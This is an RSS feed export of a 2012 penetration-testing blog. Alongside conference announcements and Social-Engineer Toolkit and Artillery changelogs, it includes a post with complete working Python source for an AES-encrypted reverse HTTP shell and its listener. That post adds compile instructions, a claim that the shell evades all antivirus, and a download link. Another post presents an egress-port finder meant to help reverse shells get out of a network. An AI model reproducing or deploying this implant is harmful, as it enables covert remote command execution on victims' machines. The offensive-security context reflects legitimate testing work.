<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SecManiac.com</title>
	<atom:link href="http://www.secmaniac.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.secmaniac.com</link>
	<description>Dave (ReL1K) Kennedy&#039;s Security Haven</description>
	<lastBuildDate>Tue, 15 May 2012 00:04:53 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>BSIDES Cleveland !!!! July 13th 2012</title>
		<link>https://www.secmaniac.com/blog/2012/05/14/bsides-cleveland-july-13th-2012/</link>
		<comments>https://www.secmaniac.com/blog/2012/05/14/bsides-cleveland-july-13th-2012/#comments</comments>
		<pubDate>Mon, 14 May 2012 23:58:11 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[May 2012]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=1033</guid>
		<description><![CDATA[We have been busy planning frantically and proud to announce BSIDES Cleveland! Just a couple items of interest, there will be a huge after party, lock pick village, and a couple of other huge announcements. Also an exciting thing, DerbyCon is a sponsor to BSIDES Cleveland! We love this community and any chance we get [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>We have been busy planning frantically and are proud to announce BSIDES Cleveland! Just a couple of items of interest: there will be a huge after party, a lock pick village, and a couple of other huge announcements. Also exciting: DerbyCon is a sponsor of BSIDES Cleveland! We love this community, and any chance we get to sponsor something like this we hop right in.</p>
<p><strong>The call for papers is now LIVE! It ends June 15th 2012.</strong></p>
<p>Registration opens tomorrow at 8AM (May 15th 2012)</p>
<p><a href="http://www.securitybsides.com/w/page/27427415/BSidesCleveland" title="http://www.securitybsides.com/w/page/27427415/BSidesCleveland">http://www.securitybsides.com/w/page/27427415/BSidesCleveland</a></p>
<p>Get them quick. As you can imagine, anything we plan is going to be biiiiiggg <img src='https://www.secmaniac.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Follow BSIDES Cleveland at: <a href="https://twitter.com/#!/BSidesCleveland" title="https://twitter.com/#!/BSidesCleveland">https://twitter.com/#!/BSidesCleveland</a></p>
<p><strong>Conference Events:</strong></p>
<p>Multiple Tracks<br />
Lock Picking Tables<br />
Giveaways / Prizes<br />
Entertainment<br />
After Party</p>
<p><strong>Special thanks to the sponsors:</strong></p>
<p>Diebold<br />
Accuvant<br />
DerbyCon<br />
Rapid7<br />
NEOISF<br />
Hurricane Labs</p>
<p><strong>Special thanks to: </strong></p>
<p>Dave DeSimone and Kyle &#8220;Karl&#8221; Tomsik &#8212; without the help of these two individuals BSIDES Cleveland would not be possible.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/05/14/bsides-cleveland-july-13th-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DerbyCon ticket sales THIS FRIDAY! 1PM EST</title>
		<link>https://www.secmaniac.com/blog/2012/04/24/derbycon-ticket-sales-this-friday-1pm-est/</link>
		<comments>https://www.secmaniac.com/blog/2012/04/24/derbycon-ticket-sales-this-friday-1pm-est/#comments</comments>
		<pubDate>Tue, 24 Apr 2012 22:54:33 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[April 2012]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=1028</guid>
		<description><![CDATA[DerbyCon tickets will go on sale for training and normal admission this Friday, April 27, 2012 at 1:00PM EST. General admission tickets will cost $150.00 each and training will be $1,000 each. This year is going to be AMAZING! Head over to http://www.derbycon.com for more information. Call for papers are also open! Check out the [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>DerbyCon tickets will go on sale for training and normal admission this Friday, April 27, 2012 at 1:00PM EST. General admission tickets will cost $150.00 each and training will be $1,000 each. This year is going to be AMAZING! Head over to <a href="http://www.derbycon.com" title="http://www.derbycon.com">http://www.derbycon.com</a> for more information. The call for papers is also open! Check out the ISDPodcast THIS Friday at 1:00PM for a live special episode when ticket sales open. Taken from the DerbyCon website:</p>
<p>&#8220;We will be opening up ticket sales on Friday at 1:00PM EST on April 27th 2012. Both training and normal conference tickets will be going on sale at this time. We feel we have a very stable ticketing system at this point from the tests last week and don’t anticipate any major issues! We look forward to seeing everyone at DerbyCon this year… It’s going to be amazing!!!</p>
<p>The call for papers is also open! Check out the CFP section <a href="https://www.derbycon.com/call-for-papers/" title="https://www.derbycon.com/call-for-papers/">on the DerbyCon site here</a>.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/04/24/derbycon-ticket-sales-this-friday-1pm-est/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Social-Engineer Toolkit v3.2 codename &#8220;#FreeHugs&#8221; has been released.</title>
		<link>https://www.secmaniac.com/blog/2012/04/02/the-social-engineer-toolkit-v3-2-codename-freehugs-has-been-released/</link>
		<comments>https://www.secmaniac.com/blog/2012/04/02/the-social-engineer-toolkit-v3-2-codename-freehugs-has-been-released/#comments</comments>
		<pubDate>Mon, 02 Apr 2012 20:23:53 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[April 2011]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=1017</guid>
		<description><![CDATA[The Social-Engineer Toolkit version 3.2 codename &#8220;#FreeHugs&#8221; has been released. This has a number of additions including a new payload selection for a reverse HTTP shell built specifically for the toolkit. In addition there have been a number of additional Metasploit exploits added to the Metasploit Browser attacks and much more. A full changelog can [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>The Social-Engineer Toolkit version 3.2 codename &#8220;#FreeHugs&#8221; has been released. This release has a number of additions, including a new payload selection for a reverse HTTP shell built specifically for the toolkit. In addition, a number of new Metasploit exploits have been added to the Metasploit browser attacks, and much more. The full changelog follows:</p>
<p>~~~~~~~~~~~~~~~~<br />
version 3.2<br />
~~~~~~~~~~~~~~~~</p>
<p> * added a new payload to the HTTP attack vectors &#8211; the SET Reverse HTTP Shell, which uses native AES encryption for tunneling commands back and forth<br />
 * added the new SET RevHTTP shell into the Java Applet attack vector<br />
 * added the Java AtomicReferenceArray Type Violation Vulnerability exploit to the Metasploit attack vectors<br />
 * added the Adobe Flash Player MP4 &#8216;cprt&#8217; Overflow exploit to the Metasploit attack vectors<br />
 * added the MS12-004 midiOutPlayNextPolyEvent Heap Overflow exploit to the Metasploit attack vectors<br />
 * added an exception for the Java AtomicReferenceArray exploit to select the Java Meterpreter instead of the standard one, since it is specific to that exploit<br />
 * reintroduced the set-web shell into the main repositories; it may still be buggy &#8212; plan on rewriting it soon<br />
 * added changes and obfuscation to the SET RevHTTP shell and changed the cipher key exchange for the binary<br />
 * added a quit routine to the new SET RevHTTP shell &#8212; quit and exit both work<br />
 * recompiled the SET RevShell as a non-console application so it will not spit out any input even if it&#8217;s discovered<br />
 * removed slim_set.py; it was no longer being used and no longer needed<br />
 * fixed an error where finishing one attack vector and then launching another would throw an attack_vector not found exception (thanks Vinny Troia for the report)</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/04/02/the-social-engineer-toolkit-v3-2-codename-freehugs-has-been-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Building an HTTP shell with AES + Proxy Support in Python</title>
		<link>https://www.secmaniac.com/blog/2012/03/08/building-a-native-http-shell-with-aes-in-python/</link>
		<comments>https://www.secmaniac.com/blog/2012/03/08/building-a-native-http-shell-with-aes-in-python/#comments</comments>
		<pubDate>Thu, 08 Mar 2012 00:55:54 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[March 2012]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=999</guid>
		<description><![CDATA[Got a little bored today and decided to write a reverse HTTP shell in Python thats platform independent and supports AES encryption when passing information back and forth. So this works on Linux, OSX, and Windows. The shell also supports proxy settings as well. This Python shell will initiate a reverse connection out of the [...]]]></description>
			<content:encoded><![CDATA[<p>Got a little bored today and decided to write a reverse HTTP shell in Python thats platform independent and supports AES encryption when passing information back and forth. So this works on Linux, OSX, and Windows. The shell also supports proxy settings as well. This Python shell will initiate a reverse connection out of the network and connect to the attacker machine via pure HTTP communications. It&#8217;s pretty straight forward on how it works. I&#8217;ve byte compiled the code so you do not need to have Python installed on the victim, it will simply run as a normal executable. </p>
<p>As usual, with anything custom evades every anti-virus out there (0/43):</p>
<p><img src="https://www.secmaniac.com/files/virustotal_no_detect.png" alt="evading anti-virus" /></p>
<p>Here&#8217;s the shell in action on the victim machine:</p>
<pre>
<code>
C:\Documents and Settings\Administrator\Desktop>shell.exe

AES Encrypted Reverse HTTP Shell by:
        Dave Kennedy (ReL1K)

http://www.secmaniac.com

Usage: shell.exe reverse_ip_address port

C:\Documents and Settings\Administrator\Desktop>shell.exe 192.168.235.152 80
</code>
</pre>
<p>Here&#8217;s what we see on the attacker machine:</p>
<pre>
<code>
root@bt:~/Desktop# python server.py
############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
#        Dave Kennedy (ReL1K)
#     http://www.secmaniac.com
#
#
############################################
Starting encrypted web shell server, use Ctrl-C to stop

shell> 192.168.235.131 - - [07/Mar/2012 19:47:10] "GET / HTTP/1.1" 200 -
192.168.235.131 - - [07/Mar/2012 19:47:10] "POST /index.aspx HTTP/1.1" 200 -

shell> ipconfig
192.168.235.131 - - [07/Mar/2012 19:47:15] "GET / HTTP/1.1" 200 -
192.168.235.131 - - [07/Mar/2012 19:47:15] "POST /index.aspx HTTP/1.1" 200 -

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.235.131
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.235.2

Ethernet adapter Bluetooth Network Connection:

        Media State . . . . . . . . . . . : Media disconnected

shell>
</code>
</pre>
<p>As you can see, we have a full shell to the victim; at this point, based on the code, it&#8217;s trivial to implement upload/download commands and anything else we want from a purely stateful HTTP shell. When a command is sent from the server, it is encrypted with AES and sent to the victim machine, where it is decrypted and executed in a command shell. When the response is taken from the command shell, it is encrypted again and sent back to the listener. There is never a point in time where communications are sent unencrypted.</p>
<p>Here&#8217;s the source code for the encrypted shell:</p>
<pre>
<code>

#!/usr/bin/python
##########################################################################################################################
#
#
#  AES Encrypted Reverse HTTP Shell by:
#
#         Dave Kennedy (ReL1K)
#      http://www.secmaniac.com
#
##########################################################################################################################
#
##########################################################################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################

import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os
from Crypto.Cipher import AES

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length.  This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

# secret key, change this if you want to be unique
secret = "Fj39@vF4@54&#038;8dE@!)(*^+-pL;'dK3J2"

# create a cipher object using the random secret
cipher = AES.new(secret)

# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"

# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
	auth_handler = urllib2.HTTPBasicAuthHandler()
	auth_handler.add_password(realm='RESTRICTED ACCESS',
                          	  uri=PROXY_URL, # PROXY SPECIFIED ABOVE
                              user=USERNAME, # USERNAME SPECIFIED ABOVE
                              passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
	opener = urllib2.build_opener(auth_handler)
	urllib2.install_opener(opener) 

try:
	# our reverse listener ip address
	address = sys.argv[1]
	# our reverse listener port address
	port = sys.argv[2]

# except that we didn't pass parameters
except IndexError:
        print " \nAES Encrypted Reverse HTTP Shell by:"
        print "        Dave Kennedy (ReL1K)"
        print "      http://www.secmaniac.com"
        print "Usage: shell.exe &lt;reverse_ip_address&gt; &lt;port&gt;"
	sys.exit()

# loop forever
while 1:

	# open up our request handelr
	req = urllib2.Request('http://%s:%s' % (address,port))
	# grab our response which contains what command we want
	message = urllib2.urlopen(req)
	# base64 unencode
	message = base64.b64decode(message.read())
	# decrypt the communications
	message = DecodeAES(cipher, message)
	# quit out if we receive that command
	if message == "quit" or message == "exit":
                sys.exit()
	# issue the shell command we want
	proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
	# read out the data of stdout
	data = proc.stdout.read() + proc.stderr.read()
	# encrypt the data
	data = EncodeAES(cipher, data)
	# base64 encode the data
	data = base64.b64encode(data)
	# urlencode the data from stdout
	data = urllib.urlencode({'cmd': '%s'}) % (data)
	# who we want to connect back to with the shell
	h = httplib.HTTPConnection('%s:%s' % (address,port))
	# set our basic headers
	headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
	# actually post the data
	h.request('POST', '/index.aspx', data, headers)
</code>
</pre>
<p>Here&#8217;s the code for the listener:</p>
<pre>
<code>

#!/usr/bin/python
############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
#        Dave Kennedy (ReL1K)
#     http://www.secmaniac.com
#
#
############################################
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import urlparse
import re
import os
import base64
from Crypto.Cipher import AES

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length.  This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

# 32 character secret key - change this if you want to be unique
secret = "Fj39@vF4@54&#038;8dE@!)(*^+-pL;'dK3J2"

# create a cipher object using the random secret
cipher = AES.new(secret)

# url decode for postbacks
def htc(m):
    return chr(int(m.group(1),16))

# url decode
def urldecode(url):
    # match a percent-encoded byte: exactly two hex digits (0-9, a-f, A-F)
    rex=re.compile('%([0-9a-fA-F][0-9a-fA-F])',re.M)
    return rex.sub(htc,url)

class GetHandler(BaseHTTPRequestHandler):

	# handle get request
	def do_GET(self):		

		# this will be our shell command
		message = raw_input("shell> ")
		# send a 200 OK response
        	self.send_response(200)
		# end headers
        	self.end_headers()
		# encrypt the message
		message = EncodeAES(cipher, message)
		# base64 it
		message = base64.b64encode(message)
		# write our command shell param to victim
        	self.wfile.write(message)
		# return out
        	return

	# handle post request
	def do_POST(self):

	        # send a 200 OK response
        	self.send_response(200)
		# # end headers
        	self.end_headers()
		# grab the length of the POST data
                length = int(self.headers.getheader('content-length'))
		# read in the length of the POST data
                qs = self.rfile.read(length)
		# url decode
                url=urldecode(qs)
                # remove the parameter cmd
                url=url.replace("cmd=", "")
		# base64 decode
		message = base64.b64decode(url)
		# decrypt the string
		message = DecodeAES(cipher, message)
		# display the command back decrypted
		print message

if __name__ == '__main__':

	# bind to all interfaces
    	server = HTTPServer(('', 80), GetHandler)
	print """############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
#        Dave Kennedy (ReL1K)
#     http://www.secmaniac.com
#
#
############################################"""
        print 'Starting encrypted web shell server, use &lt;Ctrl-C&gt; to stop'
	# simple try block
	try:
		# serve and listen forever
	    	server.serve_forever()
	# handle keyboard interrupts
	except KeyboardInterrupt:
		print "[!] Exiting the encrypted webserver shell.. hack the gibson."
</code>
</pre>
<p>If you want to download the already compiled shell.exe and all of the source code <a href="https://www.secmaniac.com/files/encrypted_http_shell.zip" title="encrypted http shell">click here to download</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/03/08/building-a-native-http-shell-with-aes-in-python/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New tool release &#8211; &#8220;Egress Buster&#8221; &#8211; Find outbound ports</title>
		<link>https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/</link>
		<comments>https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/#comments</comments>
		<pubDate>Wed, 29 Feb 2012 02:11:21 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[February 2012]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=991</guid>
		<description><![CDATA[A friend was recently on a penetration test and needed a port on the outside. I haven&#8217;t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that so I wrote one real quick. Note that this was written in about 15 minutes and [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /><br />
A friend was recently on a penetration test and needed to find a port that was open outbound. I haven&#8217;t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and things like that, so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I&#8217;ll probably go back and clean it up sometime. There are some limitations; for one, operating systems in general start to puke when you generate over 1000 listeners, so you will need to test 1000 at a time. The good news is the socket handlers are multi-threaded, so you can cycle through about 1000 ports in well under a minute. Here&#8217;s the general concept:</p>
<p>You are on the inside network somehow and need to find what ports are allowed out to the Internet. There are two main files/components &#8211; egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to reach an Internet-facing computer that&#8217;s running egress_listener.</p>
<p>Very simple to run:</p>
<p>On victim:</p>
<pre><code>
egressbuster.exe &lt;reverse_listener_ip_address&gt; &lt;low_port_range-high_port_range&gt;
example: egressbuster.exe 208.1.1.1 1-1000
</code></pre>
<p>In the above example, we specify a low and a high port range; egressbuster will attempt to connect outbound on every port from 1 to 1000 to wherever the reverse listener is.</p>
<p>The listener:</p>
<pre><code>
python egress_listener.py &lt;low_port_range-high_port_range&gt;
example: python egress_listener.py 1-1000
</code></pre>
<p>In the above example, we just specify the range we need to listen on, so the listener waits on ports 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side:</p>
<pre><code>
192.168.235.131 connected on port: 170
192.168.235.131 connected on port: 171
192.168.235.131 connected on port: 172
192.168.235.131 connected on port: 173
192.168.235.131 connected on port: 174
192.168.235.131 connected on port: 175
192.168.235.131 connected on port: 176
192.168.235.131 connected on port: 177
192.168.235.131 connected on port: 178

</code></pre>
<p>If you&#8217;re interested, download the byte-compiled code and the <a href="https://www.secmaniac.com/files/egressbuster.zip" title="egressbuster">python source here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Artillery 0.4 alpha has been released!</title>
		<link>https://www.secmaniac.com/blog/2012/02/27/artillery-0-4-alpha-has-been-released/</link>
		<comments>https://www.secmaniac.com/blog/2012/02/27/artillery-0-4-alpha-has-been-released/#comments</comments>
		<pubDate>Mon, 27 Feb 2012 04:01:30 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[February 2012]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=989</guid>
		<description><![CDATA[Artillery 0.4 has been released, this version adds cidr notation whitelisting capabilities as well as bug fixes and additional enhancements. Enjoy. Changelog: ~~~~~~~~~~~~~~~~~~~~~~ version 0.4 alpha ~~~~~~~~~~~~~~~~~~~~~~ * added ability to use cidr notations in the artillery config so you can do something like 127.0.0.1,localhost,192.168.235.1/24,etc. * code cleanup and commenting on multiple directories * added [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>Artillery 0.4 has been released. This version adds CIDR-notation whitelisting as well as bug fixes and additional enhancements. Enjoy.</p>
<p>Changelog:</p>
<p>~~~~~~~~~~~~~~~~~~~~~~<br />
version 0.4 alpha<br />
~~~~~~~~~~~~~~~~~~~~~~</p>
<p>* added the ability to use CIDR notation in the artillery config, so you can do something like 127.0.0.1,localhost,192.168.235.1/24,etc.<br />
* code cleanup and commenting in multiple directories<br />
* added a number of new core modules, most notably CIDR notation support<br />
* changed install.py to setup.py<br />
* moved the root README to readme/ and deleted the old one<br />
* added better detection around restart_server.py for whether artillery was present<br />
* cleaned up some old threading syntax issues</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/02/27/artillery-0-4-alpha-has-been-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Social-Engineer Toolkit 3.1 Codename &#8220;User Awareness&#8221; has been released!</title>
		<link>https://www.secmaniac.com/blog/2012/02/27/the-social-engineer-toolkit-3-1-codename-user-awareness-has-been-released/</link>
		<comments>https://www.secmaniac.com/blog/2012/02/27/the-social-engineer-toolkit-3-1-codename-user-awareness-has-been-released/#comments</comments>
		<pubDate>Mon, 27 Feb 2012 03:36:34 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[February 2012]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=987</guid>
		<description><![CDATA[You heard it right. SET 3.1 has been released. I decided to go crazy on another development binge. This release has a number of bug fixes and re-introduces the set-web GUI. This release also has some major performance boosts and some new options. SET is under a bit of a rehaul when it comes to [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>You heard it right. SET 3.1 has been released. I decided to go crazy on another development binge. This release has a number of bug fixes and re-introduces the set-web GUI. It also has some major performance boosts and some new options. SET is undergoing a bit of a rehaul when it comes to centralizing its information and how its components report to each other. This version kicks that off, with much more to come.</p>
<p>Full changelog below:</p>
<p>~~~~~~~~~~~~~~~~<br />
version 3.1<br />
~~~~~~~~~~~~~~~~</p>
<p> * added better error handling within harvester.py &#8211; should fix a transmission error bug when users close the browser halfway through<br />
 * licensing has been changed to reflect 2012 and the new hug licensing agreement <img src='https://www.secmaniac.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  it will prompt the next time you launch set<br />
 * fixed a bug where, if you were using self-signed java applets, it would throw an error that signapplet was already used &#8211; added randomized string values to it<br />
 * did some code cleanup on harvester and removed old code<br />
 * changed self_sign.py to import from the setcore libraries<br />
 * fixed a bug where importing your own custom executable into SET would throw an exception due to shutil.copyfile not properly defining the file name<br />
 * added a break within the custom executable import so the while 1 loop does not terminate the web server thread &#8211; control-c exits when finished with the java applet attack<br />
 * rehauled the set-web interface; it is now back to being supported and included in the main libraries<br />
 * fixed a spacing issue in the spear phishing menu between the last two exploits<br />
 * added the Adobe U3 exploit to the phishing site for set-web<br />
 * added the Rhino Java Exploit to the webattack site for set-web<br />
 * rehauled most modules to change from src.core import setcore to from src.core.setcore import *<br />
 * fixed a bug where using web templates and selecting the SE Toolkit payload would error out<br />
 * fixed a bug that caused listener.py to not be found when using web templates<br />
 * added a new check routine for set.options, which will be the central store for all set related options instead of different files<br />
 * added the new check routine into spawn.py to check for custom executables; will start converting everything in the next release</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/02/27/the-social-engineer-toolkit-3-1-codename-user-awareness-has-been-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Social-Engineer Toolkit (SET) 3.0 &#8220;#WeThrowBaseBalls&#8221; has been released.</title>
		<link>https://www.secmaniac.com/blog/2012/02/20/the-social-engineer-toolkit-set-3-0-wethrowbaseballs-has-been-released/</link>
		<comments>https://www.secmaniac.com/blog/2012/02/20/the-social-engineer-toolkit-set-3-0-wethrowbaseballs-has-been-released/#comments</comments>
		<pubDate>Mon, 20 Feb 2012 21:14:27 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[February 2012]]></category>

		<guid isPermaLink="false">https://www.secmaniac.com/?p=975</guid>
		<description><![CDATA[Greetings all. I&#8217;m excited to release the 3.0 version of the Social-Engineer Toolkit (SET) Codename &#8220;#WeThrowBaseballs&#8221;. This release has been one of the most challenging ones thus far with the largest changelog, code rehaul, and features. I&#8217;ve literally been working on this for a solid three months. Please note that this is a major rehaul [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>Greetings all. I&#8217;m excited to release the 3.0 version of the Social-Engineer Toolkit (SET), codename &#8220;#WeThrowBaseballs&#8221;. This release has been one of the most challenging ones thus far, with the largest changelog, code rehaul, and feature set. I&#8217;ve literally been working on this for a solid three months. Please note that this is a major rehaul of the existing codebase, so there are bound to be bugs. Please report bugs to davek [at] secmaniac.com. There&#8217;s really way too much to cover on what&#8217;s changed, but here are a couple of major highlights (also check out the video!). It&#8217;s truly humbling and inspiring to see how far SET has come as a tool used by virtually every penetration tester and security-minded folks. Could have never envisioned what it&#8217;s turned into and can&#8217;t thank everyone enough for the support. </p>
<p>If you support SET, please vote for us on SecTools! <a href="http://sectools.org/tool/socialengineeringtoolkit/">http://sectools.org/tool/socialengineeringtoolkit/</a></p>
<p>1. Support for Windows &#8211; tested on XP, Windows 7, and Windows Vista. Note that the Metasploit-based payloads do not work yet &#8211; when SET detects Windows they will not be shown; only RATTE and the SET Shell will be offered<br />
2. New attack vector added &#8211; QRCode Attack &#8211; Generates QRCodes that you can direct to SET and perform attacks like the credential harvester and Java Applet attacks<br />
3. Improved A/V avoidance on the SETShell and better performance. I&#8217;ve also fixed the non-encrypted communications when AES was not installed<br />
4. Added a number of improvements and enhancements to all aspects of SET including major rehauls of the coding population and moved from things like subprocess.Popen(&#8220;mv etc.&#8221;) to shutil.copyfile(&#8220;etc&#8221;)<br />
5. Rehauled SET Interactive Shell and RATTE to support Windows<br />
6. New Metasploit exploits added to SET</p>
<p>Those are the main highlights. Check out the video below:</p>
<p><iframe src="http://player.vimeo.com/video/37134279?title=0&amp;byline=0&amp;portrait=0" width="700" height="394" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe></p>
<p>Full changelog below:</p>
<p>~~~~~~~~~~~~~~~~<br />
version 3.0<br />
~~~~~~~~~~~~~~~~</p>
<p> * added the Adobe U3D memory corruption exploit from Metasploit to SET<br />
 * added new core library check_os for smart OS detection<br />
 * bug fix in Phishing using the smtp_client module (Thanks for the patch Stephen Haywood)<br />
 * rehauled set launcher to be windows compliant<br />
 * rehauled set-proxy to be windows compliant<br />
 * rehauled setup.py to be windows compliant<br />
 * rehauled setcore to be windows compliant<br />
 * added a new directory called thirdparty, this will dynamically import modules that are required versus having to install, if that fails you will have to manually download and install the depends<br />
 * removed the subprocess.Popen depends on src/core/set.py, this is no longer needed and converted to os.remove, os.makedirs, and shutil.copyfile instead<br />
 * Completely rehauled src/html/web_server.py to where it is no longer needed using pexpect. The goal is to move all depends to not require pexpect as it is not supported in Windows. All code now resides in src/html/spawn.py and is multi threading and background threaded<br />
 * spawn.py uses multi-threaded webserver and rehauled to be windows compliant. pexpect is no longer used for windows systems as it is not supported, had to move to os.system for now, importing the module with thread locks caused lockup issues<br />
 * rehauled listener.py to be compatible with windows<br />
 * fixed a bug that would cause pexpect to not be found if selecting SET interactive shell (no longer needed)<br />
 * rehauled src/webattack/web_clone/cloner.py to be windows compliant and now supports java applet attack rewrite for wgeting websites<br />
 * changed set executable to cleanup program_junk but skip .svn which would cause conflicts, this works on both windows and nix based systems<br />
 * fixed a bug on credential harvester if it wasn&#8217;t installed it should except via ImportError versus IndexError. this was changed to ImportError and allow normal execution while disabling SSL support<br />
 * rehauled src/webattack/harvester/scraper.py to be windows compliant<br />
 * rehauled src/webattack/harvester/harvester.py to be windows compliant<br />
